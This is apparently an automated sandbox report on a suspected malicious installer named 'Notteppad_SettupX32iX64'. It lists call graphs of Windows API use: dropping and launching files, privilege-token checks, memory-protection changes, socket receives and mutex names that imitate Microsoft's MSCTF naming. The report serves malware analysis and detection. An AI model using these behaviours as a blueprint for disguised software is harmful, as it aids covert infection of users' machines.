CreateFileMappingW 14164->14166 14167 6e3583 ??3@YAXPAX 14165->14167 14168 6e356a GetLastError 14166->14168 14169 6e3008 14166->14169 14167->14161 14170 6e3570 ??3@YAXPAX 14168->14170 14171 6e300f MapViewOfFile 14169->14171 14170->14163 14172 6e3559 GetLastError 14171->14172 14173 6e3029 strlen memcpy 
memcpy memcpy strcpy 14171->14173 14174 6e355f CloseHandle 14172->14174 14175 6e30a5 UnmapViewOfFile 14173->14175 14176 6e30a1 14173->14176 14174->14170 14177 6e30b6 14175->14177 14176->14175 14178 6e3122 lstrcpyW 14177->14178 14179 6e651b 3 API calls 14178->14179 14180 6e3152 14179->14180 14181 6e651b 3 API calls 14180->14181 14182 6e3165 14181->14182 14182->14174 14183 6e651b 3 API calls 14182->14183 14184 6e3186 14183->14184 14185 6e2975 4 API calls 14184->14185 14186 6e31b3 14185->14186 14186->14174 14187 6e651b 3 API calls 14186->14187 14188 6e31d0 14187->14188 14189 6e651b 3 API calls 14188->14189 14190 6e31e2 14189->14190 14191 6e3381 GetTickCount _snwprintf ExpandEnvironmentStringsW 14190->14191 14192 6e31f1 GetTickCount _snwprintf ExpandEnvironmentStringsW 14190->14192 14193 6e354d ??3@YAXPAX 14191->14193 14195 6e33b9 CreateFileW 14191->14195 14192->14193 14194 6e3229 CreateFileW 14192->14194 14193->14174 14194->14193 14197 6e3249 WriteFile CloseHandle 14194->14197 14195->14193 14196 6e33d9 WriteFile FindCloseChangeNotification 14195->14196 14196->14193 14198 6e3406 14196->14198 14197->14193 14199 6e3276 14197->14199 14198->14193 14200 6e340f _snwprintf 14198->14200 14199->14193 14201 6e327f _snwprintf 14199->14201 14203 6e343b 14200->14203 14202 6e32ab 14201->14202 14202->14193 14204 6e32b6 GetModuleHandleA 14202->14204 14203->14193 14205 6e3446 GetModuleHandleA 14203->14205 14206 6e32de 14204->14206 14207 6e32d1 GetProcAddress 14204->14207 14208 6e346e 14205->14208 14209 6e3461 GetProcAddress 14205->14209 14210 6e32e6 GetProcAddress 14206->14210 14211 6e32f3 ExpandEnvironmentStringsW 14206->14211 14207->14206 14212 6e3476 GetProcAddress 14208->14212 14213 6e3483 ExpandEnvironmentStringsW 14208->14213 14209->14208 14210->14211 14216 6e336c 14211->14216 14217 6e3319 GetStartupInfoW CreateProcessW 14211->14217 14212->14213 14218 6e34ae 14213->14218 14219 6e353f 14213->14219 14216->14193 14216->14219 14217->14216 14220 6e334e WaitForSingleObject CloseHandle 
CloseHandle 14217->14220 14221 6e34ee GetStartupInfoW CreateProcessW 14218->14221 14222 6e34b3 CoInitialize 14218->14222 14219->14193 14220->14216 14221->14219 14223 6e3521 WaitForSingleObject CloseHandle CloseHandle 14221->14223 14224 6e3f5f 10 API calls 14222->14224 14223->14219 14225 6e34bf 14224->14225 14226 6e34cf 14225->14226 14227 6e34c8 14225->14227 14229 6e6f32 14 API calls 14226->14229 14228 6e6977 20 API calls 14227->14228 14230 6e34cd 14228->14230 14229->14230 14230->14216 14231 6e34db Sleep 14230->14231 14231->14216 14250 6e94b6 14232->14250 14235 6e42be 14235->14063 14235->14068 14236 6e422c GetCurrentProcess 14253 6e42c5 OpenProcessToken 14236->14253 14239 6e4240 GetCommandLineW 14240 6e424c 14239->14240 14241 6e4251 lstrlenW 14239->14241 14242 6e425b calloc 14240->14242 14241->14242 14242->14235 14243 6e426c 14242->14243 14244 6e4278 lstrcatW GetModuleFileNameW 14243->14244 14245 6e4270 lstrcpyW 14243->14245 14246 6e429b 14244->14246 14247 6e42b6 ??3@YAXPAX 14244->14247 14245->14244 14249 6e42b3 14246->14249 14261 6e434f memset 14246->14261 14247->14235 14249->14247 14267 6e94c5 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14250->14267 14252 6e4224 14252->14235 14252->14236 14254 6e4238 14253->14254 14255 6e42e1 GetTokenInformation 14253->14255 14254->14235 14254->14239 14255->14254 14256 6e42f8 GetLastError 14255->14256 14256->14254 14257 6e4303 malloc 14256->14257 14257->14254 14258 6e4313 GetTokenInformation 14257->14258 14259 6e4326 GetSidSubAuthorityCount GetSidSubAuthority 14258->14259 14260 6e4340 ??3@YAXPAX 14258->14260 14259->14260 14260->14254 14262 6e436f ShellExecuteExW 14261->14262 14263 6e43bf 14261->14263 14264 6e43a5 CloseHandle 14262->14264 14265 6e43b0 14262->14265 14263->14246 14264->14263 14265->14263 14266 6e43b7 GetLastError 14265->14266 14266->14263 14267->14252 14268 4029fb 14269 402a11 GetModuleHandleW 14268->14269 14270 402afe 14268->14270 14269->14270 14272 402a70 14269->14272 14271 402ad8 
GetProcessHeap HeapFree 14271->14270 14272->14271 14273 402aa2 strlen 14272->14273 14274 402b06 NtProtectVirtualMemory 14272->14274 14275 402ad4 14272->14275 14273->14272 14274->14270 14275->14271 13141 6e53a6 13142 6e53b9 13141->13142 13143 6e53c1 13142->13143 13145 6e53d2 13142->13145 13169 6e4c91 13143->13169 13154 6e53cc 13145->13154 13157 6e642a 13145->13157 13160 6e6362 13145->13160 13146 6e5446 13147 6e544e 13146->13147 13148 6e5456 13146->13148 13173 6e52e9 13147->13173 13150 6e545a 13148->13150 13151 6e5467 13148->13151 13178 6e478a 13150->13178 13191 6e4a39 13151->13191 13158 6e643f 13157->13158 13159 6e6434 ??3@YAXPAX 13157->13159 13158->13146 13159->13158 13161 6e63f9 malloc 13160->13161 13162 6e6373 13160->13162 13163 6e63ec 13161->13163 13162->13161 13164 6e6382 13162->13164 13163->13146 13164->13163 13165 6e63b6 13164->13165 13166 6e63a2 memmove 13164->13166 13165->13165 13167 6e63c0 malloc memcpy 13165->13167 13166->13163 13168 6e642a ??3@YAXPAX 13167->13168 13168->13163 13170 6e4ca3 13169->13170 13171 6e478a 20 API calls 13170->13171 13172 6e4cd9 13171->13172 13172->13154 13174 6e52f1 13173->13174 13175 6e52fb 13174->13175 13176 6e478a 20 API calls 13174->13176 13175->13154 13177 6e52f9 13176->13177 13177->13154 13179 6e47a9 13178->13179 13180 6e47a3 13178->13180 13181 6e47b9 13179->13181 13200 6e72d2 13179->13200 13195 6e4800 13180->13195 13184 6e47d3 13181->13184 13203 6e8173 13181->13203 13188 6e47e4 13184->13188 13206 6e649c 13184->13206 13187 6e47f4 ??3@YAXPAX 13187->13154 13188->13187 13189 6e649c ??3@YAXPAX 13188->13189 13190 6e47f3 13189->13190 13190->13187 13192 6e4a6c 13191->13192 13194 6e4a51 13191->13194 13192->13194 13390 6e7434 13192->13390 13194->13154 13196 6e480c 13195->13196 13197 6e4813 ??3@YAXPAX 13195->13197 13198 6e72d2 18 API calls 13196->13198 13197->13179 13199 6e4812 13198->13199 13199->13197 13210 6e72e0 13200->13210 13204 6f0066 7 API calls 13203->13204 13205 6e8182 13204->13205 13205->13184 13207 6e64a9 13206->13207 
13209 6e64bc 13206->13209 13208 6e642a ??3@YAXPAX 13207->13208 13207->13209 13208->13209 13209->13188 13211 6e72ed 13210->13211 13212 6e649c ??3@YAXPAX 13211->13212 13213 6e72f6 13212->13213 13220 6e7311 13213->13220 13216 6e72dd 13216->13181 13217 6e642a ??3@YAXPAX 13217->13216 13256 6f0066 13220->13256 13222 6e7302 13222->13216 13222->13217 13223 6e3721 13222->13223 13251 6e64d1 13222->13251 13224 6e64d1 2 API calls 13223->13224 13230 6e373c 13224->13230 13225 6e393d 13227 6f0066 7 API calls 13225->13227 13229 6e3947 13225->13229 13226 6e3934 13228 6e649c ??3@YAXPAX 13226->13228 13227->13229 13228->13225 13229->13216 13230->13225 13230->13226 13288 6ef237 13230->13288 13232 6e381f 13232->13226 13294 6ef33a 13232->13294 13234 6e3841 13234->13226 13300 6eca28 13234->13300 13236 6e3869 13305 6ee463 13236->13305 13238 6e387b 13239 6ee463 2 API calls 13238->13239 13240 6e388d 13239->13240 13312 6ee4fc 13240->13312 13242 6e389d 13243 6eca28 memset 13242->13243 13244 6e38ce 13243->13244 13245 6ee463 2 API calls 13244->13245 13246 6e38dd 13245->13246 13247 6ee4fc 2 API calls 13246->13247 13248 6e38ed memcmp 13247->13248 13248->13226 13249 6e3903 calloc 13248->13249 13249->13226 13250 6e3919 memcpy 13249->13250 13250->13226 13252 6e64f1 13251->13252 13253 6e64e5 ??3@YAXPAX 13251->13253 13254 6e64f9 ??3@YAXPAX 13252->13254 13255 6e6507 13252->13255 13253->13252 13253->13253 13254->13254 13254->13255 13255->13216 13257 6f00a7 13256->13257 13258 6f0079 13256->13258 13257->13222 13258->13257 13259 6f00df 13258->13259 13260 6f0094 13258->13260 13265 6f141e 13259->13265 13260->13257 13262 6f009a abort 13260->13262 13263 6f00a0 13260->13263 13262->13263 13277 6f1f24 13263->13277 13266 6f1436 13265->13266 13270 6f145a 13265->13270 13267 6f143d shutdown 13266->13267 13268 6f1449 13266->13268 13271 6f144f 13267->13271 13281 6f155b 13268->13281 13270->13271 13272 6f155b 2 API calls 13270->13272 13273 6f150d closesocket 13271->13273 13274 6f151a 13271->13274 13275 6f146d 13272->13275 
13273->13274 13274->13257 13275->13271 13276 6f1496 closesocket 13275->13276 13276->13275 13286 6f179c 13277->13286 13279 6f1f2f closesocket 13280 6f1f40 13279->13280 13280->13257 13282 6f1573 13281->13282 13283 6f157e WSAIoctl 13282->13283 13284 6f15a1 CancelIo 13282->13284 13283->13284 13285 6f159c 13283->13285 13284->13271 13285->13271 13287 6f17a6 13286->13287 13287->13279 13289 6ef249 13288->13289 13293 6ef24e 13289->13293 13318 6eea38 13289->13318 13291 6ef28a 13321 6ef2e6 13291->13321 13293->13232 13328 6eefcc 13294->13328 13296 6ef355 13297 6ef368 13296->13297 13336 6eec45 13296->13336 13297->13234 13299 6ef37c 13299->13234 13301 6eca35 13300->13301 13302 6eca31 13300->13302 13389 6ef390 memset 13301->13389 13302->13236 13304 6eca42 13304->13236 13306 6ee46d 13305->13306 13307 6ee471 13305->13307 13306->13238 13308 6ee496 memcpy 13307->13308 13311 6ee4ae 13307->13311 13308->13311 13309 6ee4f4 13309->13238 13310 6ee4e3 memcpy 13310->13309 13311->13309 13311->13310 13313 6ee55a 13312->13313 13314 6ee463 2 API calls 13313->13314 13315 6ee56b 13314->13315 13316 6ee463 2 API calls 13315->13316 13317 6ee577 13316->13317 13317->13242 13324 6eea65 13318->13324 13320 6eea4a 13320->13291 13322 6eea38 _allmul 13321->13322 13323 6ef30b 13322->13323 13323->13293 13327 6eea7f 13324->13327 13325 6eeb1d 13325->13320 13326 6eeab5 _allmul 13326->13327 13327->13325 13327->13326 13347 6ef0d6 13328->13347 13331 6ef0d6 memset 13334 6eeff2 13331->13334 13335 6ef060 13334->13335 13351 6eee7e 13334->13351 13360 6eeccc 13334->13360 13335->13296 13337 6eec59 13336->13337 13338 6eec5e 13337->13338 13339 6eec74 13337->13339 13377 6eebfe memset 13338->13377 13379 6eeb28 13339->13379 13341 6eec67 13378 6eebfe memset 13341->13378 13345 6eea38 _allmul 13346 6eec70 13345->13346 13346->13299 13348 6ef0e7 13347->13348 13375 6eebfe memset 13348->13375 13350 6eefe3 13350->13331 13352 6eea38 _allmul 13351->13352 13353 6eee97 13352->13353 13354 6eea38 _allmul 13353->13354 13355 6eeeff 
13354->13355 13356 6eea38 _allmul 13355->13356 13357 6eef55 13356->13357 13358 6eea38 _allmul 13357->13358 13359 6eef7a 13358->13359 13359->13334 13361 6eea38 _allmul 13360->13361 13362 6eece8 13361->13362 13363 6eea38 _allmul 13362->13363 13364 6eecfb 13363->13364 13365 6eed96 13364->13365 13368 6eedb8 13364->13368 13366 6eedac 13365->13366 13367 6eeda4 13365->13367 13376 6eebfe memset 13366->13376 13369 6eee7e _allmul 13367->13369 13371 6eea38 _allmul 13368->13371 13374 6eedaa 13369->13374 13372 6eeddd 13371->13372 13373 6eea38 _allmul 13372->13373 13373->13374 13374->13334 13375->13350 13376->13374 13377->13341 13378->13346 13380 6eeb3a 13379->13380 13383 6eeb58 13380->13383 13382 6eeb53 13382->13345 13388 6eebfe memset 13383->13388 13385 6eea65 _allmul 13386 6eeb6d 13385->13386 13386->13385 13387 6eebeb 13386->13387 13387->13382 13388->13386 13389->13304 13393 6e7447 13390->13393 13396 6f010c 13393->13396 13395 6e7445 13395->13194 13397 6f0128 13396->13397 13398 6f0118 13396->13398 13397->13398 13401 6f08b6 13397->13401 13398->13395 13402 6f08e3 13401->13402 13403 6f014d 13402->13403 13404 6f0919 13402->13404 13405 6f090c CreateEventA 13402->13405 13403->13395 13407 6f0927 memset 13404->13407 13405->13404 13408 6f0954 memset 13407->13408 13410 6f0998 13408->13410 13411 6f09a0 WSARecv 13408->13411 13410->13411 13412 6f09e2 GetLastError 13411->13412 13413 6f09c2 13411->13413 13412->13413 13414 6f09ef WSAGetLastError 13412->13414 13417 6f0a3d RegisterWaitForSingleObject 13413->13417 13421 6f09cc 13413->13421 13415 6f09f9 WSAGetLastError 13414->13415 13416 6f0a01 WSAGetLastError 13414->13416 13415->13421 13416->13421 13418 6f0a55 GetLastError 13417->13418 13417->13421 13419 6f0a65 GetLastError 13418->13419 13420 6f0a61 GetLastError 13418->13420 13419->13421 13420->13421 13421->13403 12737 4011a0 12738 4011c9 SetUnhandledExceptionFilter 12737->12738 12739 4011ad 12737->12739 12740 4011dd 12738->12740 12739->12738 12753 4084b0 12740->12753 12744 4011ef 12745 401242 
_setmode _setmode _setmode 12744->12745 12746 4011f8 __p__fmode 12744->12746 12745->12746 12774 4081a0 12746->12774 12748 40120a 12790 407d00 12748->12790 12750 401212 __p__environ 12794 402e0b 12750->12794 12754 4011ea 12753->12754 12756 4084c4 12753->12756 12757 4076f0 12754->12757 12755 408502 _fpreset 12755->12754 12756->12754 12756->12755 12758 407705 12757->12758 12759 407718 GetCommandLineA strlen 12757->12759 12760 40770a 12758->12760 12813 401290 __getmainargs 12758->12813 12762 40773c 12759->12762 12760->12744 12763 40785f __p__pgmptr 12762->12763 12766 407b3a 12762->12766 12767 4078d0 _isctype 12762->12767 12771 409630 67 API calls 12762->12771 12772 40781d 12762->12772 12763->12760 12764 40788a GetModuleFileNameA 12763->12764 12764->12760 12765 4078b9 __p__pgmptr _strdup 12764->12765 12765->12760 12769 407d96 12766->12769 12814 407fa0 12766->12814 12767->12762 12769->12744 12770 407e04 12770->12744 12771->12762 12772->12763 12799 409630 12772->12799 12775 4081a9 12774->12775 12777 4081b0 12774->12777 12775->12748 12776 408320 12778 40825f 12776->12778 12780 408331 12776->12780 12777->12775 12777->12776 12779 4081f6 12777->12779 12781 408370 12777->12781 12778->12748 12779->12781 12786 408202 12779->12786 12785 408368 12780->12785 13013 4080b0 VirtualQuery 12780->13013 12783 408060 9 API calls 12781->12783 12784 40838a 12783->12784 12785->12748 12786->12778 12788 40823c 12786->12788 12787 4080b0 9 API calls 12787->12788 12788->12778 12788->12786 12788->12787 12992 408060 fwrite vfprintf abort 12788->12992 12791 407d09 12790->12791 12792 407ca0 atexit 12790->12792 12791->12750 12792->12750 12795 407d00 atexit 12794->12795 12796 402e16 12795->12796 13033 402b64 HeapCreate 12796->13033 12798 401233 _cexit ExitProcess 12800 409646 12799->12800 12801 409663 12800->12801 12802 409656 12800->12802 12824 408d90 12801->12824 12879 408d40 malloc 12802->12879 12805 409672 12807 40969d strlen 12805->12807 12812 409679 12805->12812 12808 4096b9 12807->12808 12809 
4096f7 _strdup 12808->12809 12810 409713 12809->12810 12809->12812 12881 408c90 12810->12881 12812->12763 12813->12760 12815 407fc0 12814->12815 12816 407fac 12814->12816 12817 408048 InitializeCriticalSection 12815->12817 12822 407fb1 12815->12822 12818 407fb5 12816->12818 12816->12822 12988 407e30 EnterCriticalSection 12816->12988 12817->12822 12818->12770 12819 407fe9 12819->12818 12821 407ff3 DeleteCriticalSection 12819->12821 12821->12818 12822->12770 12822->12818 12822->12819 12823 407e30 4 API calls 12822->12823 12823->12819 12825 408ee8 strlen 12824->12825 12826 408dab strlen 12824->12826 12849 408f03 12825->12849 12884 408390 12826->12884 12831 408d40 malloc 12832 408dfc 12831->12832 12833 409188 12832->12833 12834 408e0b 12832->12834 12835 408e1d strlen 12832->12835 12833->12805 12833->12849 12834->12835 12837 409416 12834->12837 12838 408e38 12835->12838 12836 40904e 12836->12805 12840 408d90 47 API calls 12837->12840 12841 408e6f _strdup 12838->12841 12839 408d90 47 API calls 12839->12849 12842 408e90 12840->12842 12841->12833 12843 408e88 12841->12843 12844 408e93 12842->12844 12845 408c90 5 API calls 12843->12845 12844->12833 12846 408e9e 12844->12846 12845->12842 12847 4091e0 strlen 12846->12847 12848 408ead 12846->12848 12876 408ed5 12847->12876 12848->12847 12850 408ecb 12848->12850 12849->12836 12849->12839 12855 409584 12850->12855 12850->12876 12851 409478 12852 408660 free 12851->12852 12853 409485 12852->12853 12853->12836 12854 4095a0 strlen 12858 4095b8 12854->12858 12855->12854 12861 40945b _strdup 12858->12861 12859 4092c9 strlen 12863 409233 12859->12863 12860 40926d _errno 12860->12876 12861->12851 12864 409469 12861->12864 12863->12851 12863->12859 12863->12876 12913 409f60 12863->12913 12918 409fb0 12863->12918 12927 409d60 12863->12927 12864->12851 12866 408c90 5 API calls 12864->12866 12866->12851 12869 409494 memcpy 12869->12876 12870 409355 memcpy strlen 12870->12876 12871 4093c7 _strdup 12873 409616 12871->12873 12871->12876 12872 
4095e7 malloc 12872->12876 12874 409500 strcoll 12874->12876 12875 409524 _stricoll 12875->12876 12876->12851 12876->12860 12876->12863 12876->12869 12876->12870 12876->12871 12876->12872 12876->12874 12876->12875 12877 408c90 5 API calls 12876->12877 12878 40952b malloc 12876->12878 12924 408660 12876->12924 12941 4089c0 12876->12941 12948 408cf0 12876->12948 12877->12876 12878->12876 12880 408d63 12879->12880 12880->12801 12882 4085e0 5 API calls 12881->12882 12883 408cb6 12882->12883 12883->12812 12885 40839d memcpy 12884->12885 12886 409790 setlocale 12885->12886 12887 4097b3 _strdup 12886->12887 12888 4097bd setlocale 12886->12888 12887->12888 12889 4097e0 wcstombs 12888->12889 12890 4097d8 12888->12890 12958 4085e0 12889->12958 12890->12889 12891 409858 mbstowcs 12890->12891 12893 408390 12891->12893 12895 409887 mbstowcs 12893->12895 12894 409810 wcstombs setlocale 12896 408660 free 12894->12896 12897 4098d2 12895->12897 12898 4098b1 12895->12898 12903 408de8 12896->12903 12899 4098fe 12897->12899 12902 409910 12897->12902 12898->12897 12900 409ae5 setlocale 12898->12900 12899->12889 12901 408660 free 12900->12901 12901->12903 12904 409971 wcstombs 12902->12904 12912 409a00 12902->12912 12903->12831 12906 4085e0 5 API calls 12904->12906 12907 4099c4 wcstombs 12906->12907 12908 4099de setlocale 12907->12908 12909 408660 free 12908->12909 12909->12903 12910 409b2b wcstombs 12910->12908 12911 409b52 12910->12911 12911->12908 12912->12910 12912->12912 12914 409fa0 _errno 12913->12914 12915 409f6c 12913->12915 12916 409f8e 12914->12916 12915->12916 12974 409ca0 FindNextFileA 12915->12974 12916->12863 12919 409fe0 _errno 12918->12919 12920 409fbc FindClose 12918->12920 12922 409fd9 12919->12922 12920->12919 12921 409fd1 12920->12921 12923 408660 free 12921->12923 12922->12876 12923->12922 12978 40a110 12924->12978 12928 409f28 _errno 12927->12928 12929 409d79 12927->12929 12939 409e9d 12928->12939 12930 409d82 _fullpath 12929->12930 12931 409f08 _errno 
12929->12931 12933 409da3 12930->12933 12931->12863 12932 409ef8 12932->12863 12933->12932 12934 409e47 malloc 12933->12934 12935 409f4f _errno 12934->12935 12937 409e68 12934->12937 12935->12939 12980 409bb0 FindFirstFileA 12937->12980 12939->12863 12940 408660 free 12940->12939 12947 4089de 12941->12947 12942 408a5a 12942->12876 12943 408690 6 API calls 12943->12947 12944 408a2a tolower tolower 12944->12947 12945 408a60 12945->12942 12946 4089c0 6 API calls 12945->12946 12946->12945 12947->12942 12947->12943 12947->12944 12947->12945 12949 408d04 12948->12949 12950 408cff 12948->12950 12952 408d0f 12949->12952 12954 408c90 5 API calls 12949->12954 12951 408cf0 6 API calls 12950->12951 12951->12949 12953 408d1d 12952->12953 12955 408cf0 6 API calls 12952->12955 12956 408660 free 12953->12956 12954->12952 12955->12953 12957 408d25 12956->12957 12957->12876 12959 4085f2 12958->12959 12960 40862c realloc 12958->12960 12959->12960 12961 408628 12959->12961 12962 40860a 12959->12962 12960->12894 12961->12960 12963 408640 12962->12963 12964 408610 _errno 12962->12964 12967 40a1d0 _msize 12963->12967 12964->12894 12966 408650 12966->12894 12968 40a1f8 12967->12968 12969 40a1fb realloc 12967->12969 12968->12969 12970 40a2a0 12969->12970 12972 40a21a 12969->12972 12970->12966 12971 40a26f 12971->12966 12972->12971 12973 40a25f memmove 12972->12973 12973->12971 12975 409d38 GetLastError 12974->12975 12977 409cc3 12974->12977 12976 409d42 _errno 12975->12976 12975->12977 12976->12916 12977->12916 12979 408677 free 12978->12979 12979->12876 12981 409c48 GetLastError _errno 12980->12981 12986 409bd4 12980->12986 12982 409c5b _errno 12981->12982 12983 409c7f _errno 12981->12983 12984 409c68 _errno 12982->12984 12985 409c8c _errno 12982->12985 12983->12986 12984->12986 12987 409c72 _errno 12984->12987 12985->12986 12986->12939 12986->12940 12987->12986 12989 407e7b LeaveCriticalSection 12988->12989 12991 407e4e 12988->12991 12989->12822 12990 407e50 TlsGetValue GetLastError 
12990->12991 12991->12989 12991->12990 12993 4080b0 VirtualQuery 12992->12993 12994 4080e0 12993->12994 12995 408184 12993->12995 12996 4080ee 12994->12996 12998 408110 VirtualProtect 12994->12998 12997 408060 3 API calls 12995->12997 12996->12788 13003 40819c 12997->13003 12999 40813f 12998->12999 12999->12996 13001 408159 VirtualProtect 12999->13001 13000 4081a9 13000->12788 13001->12788 13002 408370 13007 408060 3 API calls 13002->13007 13003->13000 13003->13002 13004 4081f6 13003->13004 13005 408320 13003->13005 13004->13002 13010 408202 13004->13010 13006 4080b0 3 API calls 13005->13006 13009 40825f 13005->13009 13006->13005 13008 40838a 13007->13008 13009->12788 13010->13009 13011 408060 3 API calls 13010->13011 13012 4080b0 VirtualQuery VirtualProtect VirtualProtect 13010->13012 13011->13010 13012->13010 13014 4080e0 13013->13014 13015 408184 13013->13015 13016 4080ee 13014->13016 13018 408110 VirtualProtect 13014->13018 13017 408060 6 API calls 13015->13017 13016->12780 13019 40819c 13017->13019 13020 40813f 13018->13020 13021 4081a9 13019->13021 13023 408370 13019->13023 13024 4081f6 13019->13024 13025 408320 13019->13025 13020->13016 13022 408159 VirtualProtect 13020->13022 13021->12780 13022->12780 13027 408060 6 API calls 13023->13027 13024->13023 13030 408202 13024->13030 13026 4080b0 6 API calls 13025->13026 13029 40825f 13025->13029 13026->13025 13028 40838a 13027->13028 13029->12780 13030->13029 13031 408060 6 API calls 13030->13031 13032 4080b0 6 API calls 13030->13032 13031->13030 13032->13030 13034 402b92 HeapAlloc 13033->13034 13035 402de9 13033->13035 13036 402bc1 HeapAlloc 13034->13036 13037 402dd2 HeapDestroy 13034->13037 13035->12798 13038 402be6 CreateEventW 13036->13038 13039 402daf HeapFree 13036->13039 13037->13035 13050 401ce8 GetTickCount 13038->13050 13039->13037 13042 402d65 13044 402d72 HeapFree 13042->13044 13043 401ce8 GetTickCount 13049 402c26 13043->13049 13044->13039 13045 402d94 13044->13045 13045->13039 13046 408660 free 
13045->13046 13046->13045 13047 402ce0 WaitForSingleObject 13047->13049 13049->13042 13049->13043 13049->13044 13049->13047 13052 40204d 13049->13052 13051 401cfa 13050->13051 13051->13049 13053 40206e 13052->13053 13054 40205d 13052->13054 13053->13049 13054->13054 13055 401ce8 GetTickCount 13054->13055 13055->13053 13563 409bb0 FindFirstFileA 13564 409c48 GetLastError _errno 13563->13564 13569 409bd4 13563->13569 13565 409c5b _errno 13564->13565 13566 409c7f _errno 13564->13566 13567 409c68 _errno 13565->13567 13568 409c8c _errno 13565->13568 13566->13569 13567->13569 13570 409c72 _errno 13567->13570 13568->13569 13570->13569

                                      Control-flow Graph

                                      APIs
                                      • _snwprintf.NTDLL ref: 006E44EA
                                      • OpenMutexW.KERNEL32(00100000,00000000,?), ref: 006E4503
                                      • _snwprintf.NTDLL ref: 006E455B
                                      • OpenMutexW.KERNEL32(00100000,00000000,?), ref: 006E456E
                                      • GetCurrentProcessId.KERNEL32(?), ref: 006E4581
                                      • ProcessIdToSessionId.KERNEL32(00000000), ref: 006E4588
                                      • _snwprintf.NTDLL ref: 006E45EB
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 006E45F6
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 006E4602
                                      • CreateMutexW.KERNEL32(0000000C,00000000,?), ref: 006E4615
                                      • GetLastError.KERNEL32 ref: 006E461E
                                      • CloseHandle.KERNEL32(00000000), ref: 006E46C1
                                      Strings
                                      • Global\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E44E3, 006E45E4
                                      • Session\%u\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E4554
                                      • MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E467B
                                      • NJI@, xrefs: 006E4461
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Mutex_snwprintf$DescriptorOpenProcessSecurity$CloseCreateCurrentDaclErrorHandleInitializeLastSession
                                      • String ID: Global\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}$MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}$NJI@$Session\%u\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                      • API String ID: 2300182234-919140787
                                      • Opcode ID: b56a8a8d1f7894eb2d3231aa741881c1a304bfd2b8fb49c2fd19e78a7212b1c3
                                      • Instruction ID: 8a6dc9c4ba7f90e03af957a0dd978d4bbc4cade63073375babc1fbc40ac2d284
                                      • Opcode Fuzzy Hash: b56a8a8d1f7894eb2d3231aa741881c1a304bfd2b8fb49c2fd19e78a7212b1c3
                                      • Instruction Fuzzy Hash: 5A81C7B69042A9BECB61DBE58C55FFEBBBDAB0D701F040092F694E1091D6789740DB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 596 4029fb-402a0b 597 402a11-402a6a GetModuleHandleW 596->597 598 402afe-402b05 596->598 597->598 599 402a70-402a78 597->599 600 402ad8-402af7 GetProcessHeap HeapFree 599->600 601 402a7a-402a7e 599->601 600->598 601->600 602 402a80-402a93 601->602 602->600 603 402a95-402aa0 602->603 604 402aa2-402ac9 strlen call 402446 603->604 607 402b06-402b59 NtProtectVirtualMemory 604->607 608 402acb-402ad2 604->608 607->598 608->604 609 402ad4 608->609 609->600
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$FreeHandleMemoryModuleProcessProtectVirtualstrlen
                                      • String ID: .$@$d$d$l$l$l$l$n$t
                                      • API String ID: 3869171654-4123253677
                                      • Opcode ID: 8c009e6429bca5f5803fb05feb04b0d6cf5275234e336179305ebe6cb715b210
                                      • Instruction ID: dc535bb9188bb5a5f3e5ee450a280e095102bcd1a390071168b7849c924222b8
                                      • Opcode Fuzzy Hash: 8c009e6429bca5f5803fb05feb04b0d6cf5275234e336179305ebe6cb715b210
                                      • Instruction Fuzzy Hash: AA4116715083048FC760EF15C18465ABBF0FF84318F44892EE998973A1E7B9D949CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
